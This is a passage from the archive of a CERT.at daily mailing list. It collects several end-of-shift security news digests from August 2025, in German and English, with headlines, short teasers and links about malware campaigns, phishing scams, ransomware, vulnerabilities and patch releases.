https://www.heise.de/news/ScreenConnect-Admins-im-Visier-von-Spear-Phishing… ∗∗∗ HP Security Manager: Schadcode-Lücke in Druckerverwaltungstool ∗∗∗ --------------------------------------------- Eine Sicherheitslücke in HPs Security Manager erlaubt Angreifern, Schadcode einzuschleusen. Ein Update steht bereit. --------------------------------------------- https://www.heise.de/news/HP-Security-Manager-Schadcode-Luecke-in-Druckerve… ∗∗∗ DSLRoot, Proxies, and the Threat of ‘Legal Botnets’ ∗∗∗ --------------------------------------------- The cybersecurity community on Reddit responded in disbelief this month when a self-described Air National Guard member with top secret security clearance began questioning the arrangement theyd made with company called DSLRoot, which was paying $250 a month to plug a pair of laptops into the Redditors high-speed Internet connection in the United States. This post .. --------------------------------------------- https://krebsonsecurity.com/2025/08/dslroot-proxies-and-the-threat-of-legal… ∗∗∗ Cyberangriff auf die Stadt Nürnberg: Prorussische Hacker im Verdacht ∗∗∗ --------------------------------------------- Haftbefehle wurden gegen russische Staatsangehörige erlassen --------------------------------------------- https://www.derstandard.at/story/3000000285014/cyberangriff-auf-die-stadt-n… ∗∗∗ Ewig ruft das Passwort ∗∗∗ --------------------------------------------- Die Verwendung von Passwörtern hat eine lange Tradition in der IT. Und regelmäßig sind sich alle einig, dass wir sie eigentlich loswerden sollten. Das haben wir das noch immer nicht geschafft, auch wenn Passkeys ein interessanter Ansatz sind. Daher sitzen wir alle auf großen Sammlungen von Passwörtern – die ca. 250 Einträge in .. --------------------------------------------- https://www.cert.at/de/blog/2025/8/ewig-ruft-das-passwort ∗∗∗ Nearly 2,000 Malicious IPs Probe Microsoft Remote Desktop in Single-Day Surge ∗∗∗ --------------------------------------------- On August 21, GreyNoise observed a sharp surge in scanning against Microsoft Remote Desktop (RDP) services. The wave’s aim was clear: test for timing flaws that reveal valid usernames, laying the groundwork for credential-based intrusions. --------------------------------------------- https://www.greynoise.io/blog/surge-malicious-ips-probe-microsoft-remote-de… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (ffmpeg, firebird3.0, and luajit), Fedora (chromium, python3-docs, and python3.13), Oracle (aide, firefox, glibc, libxml2, and tomcat), Red Hat (aide, git, kernel, kernel-rt, libarchive, pam, python-cryptography, python3, python3.12, and webkit2gtk3), SUSE (cmake3, ffmpeg-4, kernel, kubernetes1.18, libqt4, minikube, net-tools, pam, postgresql16, proftpd, python-urllib3, python311, python312, python36, tomcat10, tomcat11, and webkit2gtk3), and .. --------------------------------------------- https://lwn.net/Articles/1035110/ ∗∗∗ Mehrere (teils kritische) Schwachstellen in NetScaler ADC and NetScaler Gateway ∗∗∗ --------------------------------------------- 26. August 2025 Beschreibung Citrix hat ein Advisory zu mehreren, zum Teil kritischen, Schwachstellen in den Produkten NetScaler ADC (ehemals Citrix ADC) und NetScaler Gateway (ehemals Citrix Gateway) veröffentlicht. Laut Citrix wurden bereits Angriffsversuche gegen verwundbare Systeme beobachtet, welche zumindest die kritische Schwachstelle CVE-2025-7775 auszunutzen versuchten. CVE-Nummern(n): CVE-2025-7775, CVE-2025-7776, CVE-2025-8424 CVSS v4.0 Base Score(s): 9.2, 8.8, 8.7 .. --------------------------------------------- https://www.cert.at/de/warnungen/2025/8/citrix-netscaler-adc-schwachstellen… ∗∗∗ Multiple Vulnerabilities in File Station 5 ∗∗∗ --------------------------------------------- https://www.qnap.com/en-us/security-advisory/QSA-25-31 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 25.08.2025
by Daily end-of-shift report 25 Aug '25

25 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Freitag 22-08-2025 18:00 − Montag 25-08-2025 18:00 Handler: Felician Fuchs Co-Handler: Alexander Riepl ===================== = News = ===================== ∗∗∗ New Android malware poses as antivirus from Russian intelligence agency ∗∗∗ --------------------------------------------- A new Android malware posing as an antivirus tool software created by Russias Federal Security Services agency (FSB) is being used to target executives of Russian businesses. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-android-malware-poses-as… ∗∗∗ Social Engineering: Krypto-Anleger verliert Bitcoin im Wert von 90 Millionen USD ∗∗∗ --------------------------------------------- Betrüger haben einen Krypto-Anleger um ein Vermögen gebracht. Der Geschädigte ist nun um 783 Bitcoin ärmer. Das Geld sieht er wohl nie wieder. --------------------------------------------- https://www.golem.de/news/social-engineering-krypto-anleger-verliert-bitcoi… ∗∗∗ Criminal background checker APCS faces data breach ∗∗∗ --------------------------------------------- The attack first affected an upstream provider of bespoke software Exclusive A leading UK provider of criminal record checks for employers is handling a data breach stemming from a third-party development company. --------------------------------------------- https://www.theregister.com/2025/08/22/apcs_breach/ ∗∗∗ Botnet-Kampagne "Gayfemboy" auch in Deutschland aktiv ∗∗∗ --------------------------------------------- IT-Forscher von Fortinet beobachten ein IoT-Botnet, das auf "Mirai" basiert und "Gayfemboy" genannt wird. Es versteckt sich gut. --------------------------------------------- https://www.heise.de/news/Mirai-basierte-Botnet-Kampagne-Gayfemboy-auch-in-… ∗∗∗ Kriminelle locken mit angeblichen Kryptoguthaben ∗∗∗ --------------------------------------------- Lukas kann seinen Augen kaum trauen. In seinem Postfach liegt eine E-Mail, die behauptet, dass sich ein hoher Betrag in seinem Kryptowallet befindet. Um wieder Zugriff zu erhalten, soll er lediglich ein paar einfache Schritte befolgen. Doch Vorsicht: Die E-Mail stammt von Kriminellen, die ihn zu hohen Überweisungen bewegen wollen! --------------------------------------------- https://www.watchlist-internet.at/news/kriminelle-locken-mit-angeblichen-kr… ∗∗∗ Beliebte eSIMs für Reisen leiten heimlich Daten über China um ∗∗∗ --------------------------------------------- Eine aktuelle Untersuchung zeigt grobe Sicherheits- und Privatsphärendefizite bei vielen Anbietern auf. --------------------------------------------- https://www.derstandard.at/story/3000000284843/beliebte-esims-fuer-reisen-l… ∗∗∗ Phishing in the Classroom: 115,000 Emails Exploit Google Classroom to Target 13,500 Organizations ∗∗∗ --------------------------------------------- Check Point researchers have uncovered a large-scale active phishing campaign abusing Google Classroom, a platform trusted by millions of students and educators worldwide. Over the course of just one week, attackers launched .. --------------------------------------------- https://blog.checkpoint.com/email-security/phishing-in-the-classroom-115000… ∗∗∗ Chrome-Erweiterung FreeVPN.One zeichnete Screenshots von Seitenbesuchen auf ∗∗∗ --------------------------------------------- Wer bisher glaubte, dass Microsofts Recall in Punkto Überwachung an der Spitze liegt, muss umdenken. Sicherheitsforscher sind auf die Erweiterung FreeVPN.One des Google Chrome-Browsers gestoßen. Diese fertigte Screenshots von allen .. --------------------------------------------- https://www.borncity.com/blog/2025/08/24/chrome-erweiterung-freevpn-one-zei… ∗∗∗ Cybercriminals Exploit Cheap VPS to Launch SaaS Hijacking Attacks ∗∗∗ --------------------------------------------- Darktrace researchers have discovered a new wave of attacks where cybercriminals use cheap Virtual Private Servers (VPS) .. --------------------------------------------- https://hackread.com/cybercriminals-exploit-cheap-vps-saas-hijack-attacks/ ∗∗∗ Phishing Campaign Targeting Companies via UpCrypter ∗∗∗ --------------------------------------------- FortiGuard Labs recently identified a phishing campaign leveraging carefully crafted emails to deliver malicious URLs linked to convincing phishing pages. These pages are designed to entice recipients into downloading JavaScript files that act as droppers for UpCrypter, malware that ultimately deploys various remote access tools (RATs). --------------------------------------------- https://www.fortinet.com/blog/threat-research/phishing-campaign-targeting-c… ∗∗∗ Webhosting-Software cPanel: Updates schließen Sicherheitslücke ∗∗∗ --------------------------------------------- Die Verwaltungssoftware cPanel und WHM für Webhosting schließt mit neuen Versionen mindestens eine Sicherheitslücke, die als hochriskant gilt. --------------------------------------------- https://heise.de/-10599503 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 22.08.2025
by Daily end-of-shift report 22 Aug '25

22 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 21-08-2025 18:00 − Freitag 22-08-2025 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Dev gets 4 years for creating kill switch on ex-employers systems ∗∗∗ --------------------------------------------- A software developer has been sentenced to four years in prison for sabotaging his ex-employers Windows network with custom malware and a kill switch that locked out employees when his account was disabled. --------------------------------------------- https://www.bleepingcomputer.com/news/security/dev-gets-4-years-for-creatin… ∗∗∗ Fake Mac fixes trick users into installing new Shamos infostealer ∗∗∗ --------------------------------------------- A new infostealer malware targeting Mac devices, called Shamos, is targeting Mac devices in ClickFix attacks that impersonate troubleshooting guides and fixes. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fake-mac-fixes-trick-users-i… ∗∗∗ Trotz Rolling Code: Inoffizielle Flipper-Zero-Firmware soll Autos knacken ∗∗∗ --------------------------------------------- Ein russischer Akteur verkauft eine eigene Firmware für den Flipper Zero. Selbst neueste Autos gängiger Marken sollen sich damit entriegeln lassen. --------------------------------------------- https://www.golem.de/news/trotz-rolling-code-inoffizielle-flipper-zero-firm… ∗∗∗ Think before you Click(Fix): Analyzing the ClickFix social engineering technique ∗∗∗ --------------------------------------------- The ClickFix social engineering technique has been growing in popularity, with campaigns targeting thousands of enterprise and end-user devices daily. This technique exploits users’ tendency to resolve technical issues by tricking them into running malicious commands. These commands, in turn, deliver payloads that ultimately lead to information theft and .. --------------------------------------------- https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-c… ∗∗∗ Coinbase Reverses Remote-First Policy After North Korean Infiltration Attempts ∗∗∗ --------------------------------------------- Remote work policies designed to attract top talent are becoming security vulnerabilities as state-sponsored hackers seek employment at cryptocurrency firms. Coinbase has implemented mandatory in-person orientation and US citizenship requirements for sensitive roles after detecting North Korean IT workers attempting to infiltrate the company .. --------------------------------------------- https://slashdot.org/story/25/08/22/1515238/coinbase-reverses-remote-first-… ∗∗∗ Linux Malware Delivered via Malicious RAR Filenames Evades Antivirus Detection ∗∗∗ --------------------------------------------- Cybersecurity researchers have shed light on a novel attack chain that employs phishing emails to deliver an open-source backdoor called VShell.The "Linux-specific malware infection chain that starts with a spam email with a malicious .. --------------------------------------------- https://thehackernews.com/2025/08/linux-malware-delivered-via-malicious.html ∗∗∗ Interpol bags 1,209 suspects, $97M in cybercrime operation focused on Africa ∗∗∗ --------------------------------------------- Crypto mines, BEC scams, fake passports, and a $300M fraud empire allegedly brought down during Serengeti 2.0 Interpols latest clampdown on cybercrime resulted in 1,209 arrests across the African continent, from ransomware crooks to business .. --------------------------------------------- https://www.theregister.com/2025/08/22/interpol_serengeti_20/ ∗∗∗ KI-Assistent: Microsofts Copilot verfälschte monatelang Zugriffsprotokolle ∗∗∗ --------------------------------------------- Fragte man den virtuellen Copilot etwa nach Dokumenten-Zusammenfassungen, unterschlug er mitunter seine Zugriffe. Microsoft verschwieg das Problem. --------------------------------------------- https://www.heise.de/news/KI-Assistent-Microsofts-Copilot-verfaelschte-mona… ∗∗∗ Electronics manufacturer Data I/O reports ransomware attack to SEC ∗∗∗ --------------------------------------------- The tech manufacturer Data I/O reported a ransomware attack to federal regulators, writing that the incident has taken down critical operational systems. --------------------------------------------- https://therecord.media/electronics-manufacturer-dataio-ransomware ∗∗∗ AI Browsers Can Be Tricked Into Paying Fake Stores in PromptFix Attack ∗∗∗ --------------------------------------------- The PromptFix attack tricks AI browsers with fake CAPTCHAs, leading them to phishing sites and fake stores .. --------------------------------------------- https://hackread.com/ai-browsers-trick-paying-fake-stores-promptfix-attack/ ∗∗∗ AUR Chaos malware: an analysis ∗∗∗ --------------------------------------------- Recently, an incident involving malware in the AUR made the headlines. I read a lot of things around this topic, both right and wrong, and sometimes misleading. I was involved in the incident handling I chose to write this blog post, not only for transparency but also for laying down what I learned both during and .. --------------------------------------------- https://www.mh4ckt3mh4ckt1c4s.xyz/blog/aur-chaos-malware-analysis/ ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (tomcat), Debian (squid), Fedora (matrix-synapse, rust-slab, socat, and webkitgtk), SUSE (firefox-esr, gdk-pixbuf, gdk-pixbuf-devel, govulncheck-vulndb, rust-keylime, and wicked2nm), and Ubuntu (linux-nvidia, linux-oracle, linux-oracle-6.8, php7.0, php7.2, php7.4, python3.13, python3.12, python3.11, python3.10, python3.9, python3.8, python3.7, python3.6, python3.5, python3.4, and ruby-webrick). --------------------------------------------- https://lwn.net/Articles/1034755/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 21.08.2025
by Daily end-of-shift report 21 Aug '25

21 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 20-08-2025 18:00 − Donnerstag 21-08-2025 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ iPhone, iPad und Mac: Aktiv ausgenutzte Sicherheitslücke gefährdet Apple-Nutzer ∗∗∗ --------------------------------------------- Notfallupdates schließen eine aktiv ausgenutzte Sicherheitslücke in iOS, iPadOS und MacOS. Anwender sollten dringend patchen. --------------------------------------------- https://www.golem.de/news/iphone-ipad-und-mac-aktiv-ausgenutzte-sicherheits… ∗∗∗ Airtell Router Scans, and Mislabeled usernames ∗∗∗ --------------------------------------------- Looking at new usernames collected by our Cowrie honeypots, you will first of all notice a number of HTTP headers. It is very common for attackers to scan for web servers on ports that are covered by our Telnet honeypots. The result .. --------------------------------------------- https://isc.sans.edu/forums/diary/Airtell+Router+Scans+and+Mislabeled+usern… ∗∗∗ Neue Tricks mit QR-Codes ∗∗∗ --------------------------------------------- QR-Codes sind beliebte Vehikel für Verbrecher, Hyperlinks an Sicherheitssystemen vorbei zum Opfer zu schleusen. Der Einfallsreichtum ist groß. --------------------------------------------- https://www.heise.de/news/Neue-Tricks-mit-QR-Codes-10559942.html ∗∗∗ Docker Desktop: Kritische Sicherheitslücke erlaubt Host-Zugriff ∗∗∗ --------------------------------------------- In Docker Desktop können bösartige Container auf das Host-System durchgreifen, Schutzmaßnahmen greifen nicht. Ein Update hilft. --------------------------------------------- https://www.heise.de/news/Docker-Desktop-Kritische-Sicherheitsluecke-erlaub… ∗∗∗ Modern Solution: Verurteilter IT-Experte reicht Verfassungsbeschwerde ein ∗∗∗ --------------------------------------------- Das Urteil gegen einen nach dem Hackerparagrafen verurteilten Sicherheitsforscher ist rechtskräftig. Der Verurteilte geht nun nach Karlsruhe. --------------------------------------------- https://www.heise.de/news/Modern-Solution-Verurteilter-IT-Experte-reicht-Ve… ∗∗∗ SIM-Swapper, Scattered Spider Hacker Gets 10 Years ∗∗∗ --------------------------------------------- A 21-year-old Florida man at the center of a prolific cybercrime group known as "Scattered Spider" was sentenced to 10 years in federal prison today, and ordered to pay roughly $13 million in restitution to victims. Noah Michael Urban of Palm Coast, Fla. pleaded guilty in April 2025 to charges of wire fraud and conspiracy. Florida prosecutors alleged Urban .. --------------------------------------------- https://krebsonsecurity.com/2025/08/sim-swapper-scattered-spider-hacker-get… ∗∗∗ Achtung, Phishing-Falle: FinanzOnline will keine Infos zu Krypto-Beständen einholen! ∗∗∗ --------------------------------------------- Aufgrund einer neuen „Steuervorschrift für Kryptowährungen“ verlangt „FinanzOnline“ aktuell via E-Mail vermeintlich die Übermittlung umfassender Informationen rund um Krypto-Vermögen. Natürlich meldet sich hier nicht das echte Finanzportal. Vielmehr versuchen Kriminelle über diese Masche an die Zugangsdaten der Krypto-Wallets ihrer Opfer zu gelangen. --------------------------------------------- https://www.watchlist-internet.at/news/phishing-falle-finanzonline-krypto/ ∗∗∗ Your Connection, Their Cash: Threat Actors Misuse SDKs to Sell Your Bandwidth ∗∗∗ --------------------------------------------- A campaign leverages CVE-2024-36401 to stealthily monetize victims bandwidth where legitimate software development kits (SDKs) are deployed for passive income. --------------------------------------------- https://unit42.paloaltonetworks.com/attackers-sell-your-bandwidth-using-sdk… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 20.08.2025
by Daily end-of-shift report 20 Aug '25

20 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Dienstag 19-08-2025 18:00 − Mittwoch 20-08-2025 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ PyPI now blocks domain resurrection attacks used for hijacking accounts ∗∗∗ --------------------------------------------- The Python Package Index (PyPI) has introduced new protections against domain resurrection attacks that enable hijacking accounts through password resets. --------------------------------------------- https://www.bleepingcomputer.com/news/security/pypi-now-blocks-domain-resur… ∗∗∗ Hackers steal Microsoft logins using legitimate ADFS redirects ∗∗∗ --------------------------------------------- Hackers are using a novel technique that combines legitimate office.com links with Active Directory Federation Services (ADFS) to redirect users to a phishing page that steals Microsoft 365 logins. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-steal-microsoft-logi… ∗∗∗ Experts Find AI Browsers Can Be Tricked by PromptFix Exploit to Run Malicious Hidden Prompts ∗∗∗ --------------------------------------------- Cybersecurity researchers have demonstrated a new prompt injection technique called PromptFix that tricks a generative artificial intelligence (GenAI) model into carrying out intended actions by embedding the malicious instruction inside a .. --------------------------------------------- https://thehackernews.com/2025/08/experts-find-ai-browsers-can-be-tricked.h… ∗∗∗ Like burglars closing a door, Apache ActiveMQ attackers patch critical vuln after breaking in ∗∗∗ --------------------------------------------- Intruders hoped no one would notice their presence Criminals exploiting a critical vulnerability in open source Apache ActiveMQ middleware are fixing the flaw that allowed them access, after establishing persistence on Linux servers. --------------------------------------------- https://www.theregister.com/2025/08/19/apache_activemq_patch_malware/ ∗∗∗ Commvault: Hochriskante Lücke ermöglicht Einschleusen von Schadcode ∗∗∗ --------------------------------------------- In der Backup-Software Commvault können Angreifer Sicherheitslücken missbrauchen, um etwa Schadcode einzuschleusen. Updates stehen bereit. --------------------------------------------- https://www.heise.de/news/Commvault-Hochriskante-Luecke-ermoeglicht-Einschl… ∗∗∗ Infoniqa-IT-Vorfall: Cyberbande will umfangreich Daten kopiert haben ∗∗∗ --------------------------------------------- Vergangene Woche wurde ein IT-Vorfall bei HR-Softwareanbieter Infoniqa bekannt. Nun behauptet eine Cybergang Daten kopiert zu haben. --------------------------------------------- https://www.heise.de/news/Infoniqa-IT-Vorfall-Cyberbande-will-umfangreich-D… ∗∗∗ Impressumsdiebstahl und funktionierende Links: Vorsicht vor besonders ausgeklügelten Fake-Shops! ∗∗∗ --------------------------------------------- Je mehr Aufwand Kriminelle bei der Nachahmung eines Online-Shops betreiben, desto schwieriger ist es, den Betrug zu erkennen. In einem aktuellen Fall nutzen sie nicht nur reale Impressumsdaten, sondern verlinken von ihren Fake-Shops aus zusätzlich zur echten Website und auf die echten Social-Media-Profile des Unternehmens. Woran sich die Falle dennoch relativ einfach erkennen lässt. --------------------------------------------- https://www.watchlist-internet.at/news/besonders-ausgekluegelte-fake-shops/ ∗∗∗ Major Belgian telecom firm says cyberattack compromised data on 850,000 accounts ∗∗∗ --------------------------------------------- The company said no critical data was accessed, but the hacker "gained access to one of our IT systems that contains the following data: name, first name, telephone number, SIM card number, PUK code, tariff plan.” --------------------------------------------- https://therecord.media/belgian-telecom-says-cyberattack-compromised-data-o… ∗∗∗ Feds charge alleged administrator of ‘sophisticated’ Rapper Bot botnet ∗∗∗ --------------------------------------------- A 22-year-old Oregon man has been charged with running a powerful botnet-for-hire service used to launch hundreds of thousands of cyberattacks worldwide, the U.S. Justice Department said. --------------------------------------------- https://therecord.media/feds-charge-botnet-admin ∗∗∗ Russian state-sponsored espionage group Static Tundra compromises unpatched end-of-life network devices ∗∗∗ --------------------------------------------- A Russian state-sponsored group, Static Tundra, is exploiting an old Cisco IOS vulnerability to compromise unpatched network devices worldwide, targeting key sectors for intelligence gathering. --------------------------------------------- https://blog.talosintelligence.com/static-tundra/ ∗∗∗ Warlock: From SharePoint Vulnerability Exploit to Enterprise Ransomware ∗∗∗ --------------------------------------------- Warlock ransomware exploits unpatched Microsoft SharePoint vulnerabilities to gain access, escalate privileges, steal credentials, move laterally, and deploy ransomware with data exfiltration across enterprise environments. --------------------------------------------- https://www.trendmicro.com/en_us/research/25/h/warlock-ransomware.html ∗∗∗ A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor ∗∗∗ --------------------------------------------- Straight from Mandiant Threat Defense, the "Frontline Bulletin" series brings you the latest on the most intriguing compromises we are seeing in the wild right now, equipping our community to understand and respond to the most compelling threats we observe. This edition dissects an infection involving two threat groups, UNC5518 and UNC5774, leading to the deployment of .. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/analyzing-cornflak… ∗∗∗ Guess Who Would Be Stupid Enough To Rob The Same Vault Twice? Pre-Auth RCE Chains in Commvault ∗∗∗ --------------------------------------------- We’re back, and we’ve finished telling everyone that our name was on the back of Phrack!!!!1111 Whatever, nerds.Today, were back to scheduled content. Like our friendly neighbourhood ransomware gangs and APT groups, weve continued to spend .. --------------------------------------------- https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same… ∗∗∗ Researcher Exposes Zero-Day Clickjacking Vulnerabilities in Major Password Managers ∗∗∗ --------------------------------------------- At DEF CON 33, Czech Republic based security researcher Marek Tóth, unveiled a series of unpatched zero-day clickjacking security vulnerabilities impacting the browser-based plugins for a wide range of password managers including: 1Password, Bitwarden, Dashlane, Enpass, iCloud Passwords, Keeper, LastPass, LogMeOnce, NordPass, ProtonPass, and .. --------------------------------------------- https://socket.dev/blog/password-manager-clickjacking ∗∗∗ Marshal madness: A brief history of Ruby deserialization exploits ∗∗∗ --------------------------------------------- This post traces the decade-long evolution of Ruby Marshal deserialization exploits, demonstrating how security researchers have repeatedly bypassed patches and why fundamental changes to the Ruby ecosystem are needed rather than continued patch-and-hope approaches. --------------------------------------------- https://blog.trailofbits.com/2025/08/20/marshal-madness-a-brief-history-of-… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (webkit2gtk), Fedora (firefox and libarchive), Red Hat (python3.11-setuptools and python3.12-setuptools), Slackware (mozilla), SUSE (apache2-mod_security2, cairo-devel, cflow, docker, glibc, go1.25, govulncheck-vulndb, gstreamer-0_10-plugins-base, jq, kernel, libarchive, libssh, libxslt, openbao, python-urllib3, systemd, and xz), and Ubuntu (apache2, libssh, libxml2, linux, linux-aws, linux-aws-5.15, linux-gcp, linux-gcp-5.15, linux-gkeop, .. --------------------------------------------- https://lwn.net/Articles/1034546/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 19.08.2025
by Daily end-of-shift report 19 Aug '25

19 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Montag 18-08-2025 18:00 − Dienstag 19-08-2025 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ In mehreren Webportalen: Reihenweise fest kodierte Zugangsdaten bei Intel entdeckt ∗∗∗ --------------------------------------------- Ein Forscher hat in Webportalen von Intel gravierende Sicherheitslücken gefunden. Teilweise standen Passwörter clientseitig im Code. --------------------------------------------- https://www.golem.de/news/in-mehreren-webportalen-reihenweise-fest-kodierte… ∗∗∗ GodRAT – New RAT targeting financial institutions ∗∗∗ --------------------------------------------- Kaspersky experts analyze GodRAT, a new Gh0st RAT-based tool attacking financial firms. It is likely a successor of the AwesomePuppet RAT connected to the Winnti group. --------------------------------------------- https://securelist.com/godrat/117119/ ∗∗∗ The State of Ransomware in Retail 2025 ∗∗∗ --------------------------------------------- 361 IT and cybersecurity leaders reveal the ransomware realities for retail businesses today. --------------------------------------------- https://news.sophos.com/en-us/2025/08/19/the-state-of-ransomware-in-retail-… ∗∗∗ 493 Cases of Sextortion Against Children Linked to Notorious Scam Compounds ∗∗∗ --------------------------------------------- Scam compounds in Cambodia, Myanmar, and Laos have conned people out of billions. New research shows they may be linked to child sextortion crimes too. --------------------------------------------- https://www.wired.com/story/child-sextorition-scam-compounds-southeast-asia/ ∗∗∗ Marokko zerrt deutsche Zeitungen wegen Spyware-Berichten vor den BGH ∗∗∗ --------------------------------------------- Marokko steht unter Verdacht, die Spyware Pegasus gegen Anwälte, Journalisten und Politiker eingesetzt zu haben. Deutsche Medien berichteten, Marokko ist sauer. --------------------------------------------- https://www.heise.de/news/Marokko-zieht-gegen-deutsche-Spyware-Berichtersta… ∗∗∗ Angriffe auf N-able N-central laufen, mehr als 1000 Systeme ungepatcht ∗∗∗ --------------------------------------------- Noch mehr als tausend Instanzen von des RMM N-able N-central sind für kritische Lücken anfällig. Die werden bereits attackiert. --------------------------------------------- https://www.heise.de/news/Angriffe-auf-N-able-N-central-laufen-mehr-als-100… ∗∗∗ Kostenlos 10.000.000 Robux bekommen? Achtung, Fake-Angebot! ∗∗∗ --------------------------------------------- Die Online-Spieleplattform „Roblox“ ist besonders bei Kindern und Jugendlichen beliebt – und grundsätzlich kostenlos. Um bestimmte Funktionen und Inhalte freizuschalten, braucht es aber eine In-Game-Währung namens „Robux“. Und die ist wiederum nur gegen echtes Geld erhältlich. Kriminelle versuchen deshalb, User mit dem Versprechen von kostenlosen „Robux“ in die Falle zu locken. --------------------------------------------- https://www.watchlist-internet.at/news/robux-fake-angebot/ ∗∗∗ Fashionable Phishing Bait: GenAI on the Hook ∗∗∗ --------------------------------------------- GenAI-created phishing campaigns misuse tools ranging from website builders to text generators in order to create more convincing and scalable attacks. --------------------------------------------- https://unit42.paloaltonetworks.com/genai-phishing-bait/ ∗∗∗ Ransomware gang masking PipeMagic backdoor as ChatGPT desktop app: Microsoft ∗∗∗ --------------------------------------------- Hackers are disguising a powerful strain of malware as a ChatGPT desktop application in preparation for ransomware attacks, Microsoft said. --------------------------------------------- https://therecord.media/ransomware-gang-masking-pipemagic-backdoor ∗∗∗ UK ‘agrees to drop’ demand over Apple iCloud encryption, US intelligence head claims ∗∗∗ --------------------------------------------- The United Kingdom is backing down from a controversial legal demand targeting Apple, U.S. Director of National Intelligence Tulsi Gabbard claimed on social media. --------------------------------------------- https://therecord.media/uk-agrees-drop-apple-encryption ∗∗∗ Trend Micro Unmasks Global "Task Scam" Industry ∗∗∗ --------------------------------------------- Trend Micro today released new research revealing the mechanics and scale of a rapidly growing fraud model known as "task scams": sophisticated online job scams that lure victims into repetitive digital tasks and systematically strip them of funds through escalating deposit demands. --------------------------------------------- https://newsroom.trendmicro.com/2025-08-19-Trend-Micro-Unmasks-Global-Task-… ∗∗∗ Fake Copyright Notices Drop New Noodlophile Stealer Variant ∗∗∗ --------------------------------------------- Morphisec warns of a new Noodlophile Stealer variant spread via fake copyright phishing emails, using Dropbox links .. --------------------------------------------- https://hackread.com/phishing-scam-fake-copyright-notice-noodlophile-steale… ∗∗∗ How Indirect Prompt Injections Exploit Context, Format, and Salience ∗∗∗ --------------------------------------------- A breakdown of indirect prompt injection attacks using real-world cases (emails, code comments, diagrams). Introduces the CFS model (Context, Format, Salience) to explain what makes some payloads more likely to succeed. --------------------------------------------- https://www.fogel.dev/prompt_injection_cfs_framework ∗∗∗ Trivial C# Random Exploitation ∗∗∗ --------------------------------------------- Exploiting random number generators requires math, right? Thanks to C#’sRandom, that is not necessarily the case! I ran into an HTTP 2.0 web serviceissuing password reset tokens from a custom encoding of (new Random()).Next(min, max) output. This led to a critical account takeover.Exploitation did not require scripting, math or libraries. Just several clicksin Burp. While I .. --------------------------------------------- https://blog.doyensec.com/2025/08/19/trivial-exploit-on-C-random.html ===================== = Vulnerabilities = ===================== ∗∗∗ Security Vulnerabilities fixed in Firefox 142 ∗∗∗ --------------------------------------------- https://www.mozilla.org/en-US/security/advisories/mfsa2025-64/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/mailman3/postorius/lists/daily.lists.cert.at/

1 0

Tageszusammenfassung - 18.08.2025
by Daily end-of-shift report 18 Aug '25

18 Aug '25

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 14-08-2025 18:00 − Montag 18-08-2025 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Jetzt patchen! Attacken auf Fortinet-IT-Sicherheitslösungen können bevorstehen ∗∗∗ --------------------------------------------- Beide Schwachstellen (FortiSIEM CVE-2025-25256 "kritisch", FortiWeb CVE-2025-52970 "hoch") haben die Fortinet-Entwickler am vergangenen Patchday geschlossen. Kurz darauf warnten sie davor, dass Exploitcode zum Ausnutzen der Lücke in FortiSIEM in Umlauf ist. --------------------------------------------- https://www.heise.de/news/Jetzt-patchen-Attacken-auf-Fortinet-IT-Sicherheit… ∗∗∗ Should Security Solutions Be Secure? Maybe Were All Wrong - Fortinet FortiSIEM Pre-Auth Command Injection (CVE-2025-25256) ∗∗∗ --------------------------------------------- Today we’re looking at CVE-2025-25256 - a pre-authentication command injection in FortiSIEM that lets an attacker compromise an organization’s SIEM (!!!). [..] It’s the kind of “one platform to rule your SOC” solution that we believe (suspect, hope, imagine, guess, pray) might feel impressively safety-first. Except, obviously, this time it didn't because the bar remains so incredibly low. --------------------------------------------- https://labs.watchtowr.com/should-security-solutions-be-secure-maybe-were-a… ∗∗∗ Gefälschtes Gewinnspiel für Wiener Linien Jahreskarte im Umlauf ∗∗∗ --------------------------------------------- Derzeit kursieren auf Facebook gefälschte Postings, die im Namen der Wiener Linien ein Gewinnspiel für eine Halbjahreskarte bewerben. Bei Teilnahme wird suggeriert, dass man automatisch gewonnen habe. Achtung: Es handelt sich um einen Betrugsversuch, der darauf abzielt, an Bankdaten zu gelangen! --------------------------------------------- https://www.watchlist-internet.at/news/gefaelschtes-gewinnspiel-fuer-wiener… ∗∗∗ Verbesserung von nur 1,7 Prozent: Phishing-Training fast immer wirkungslos 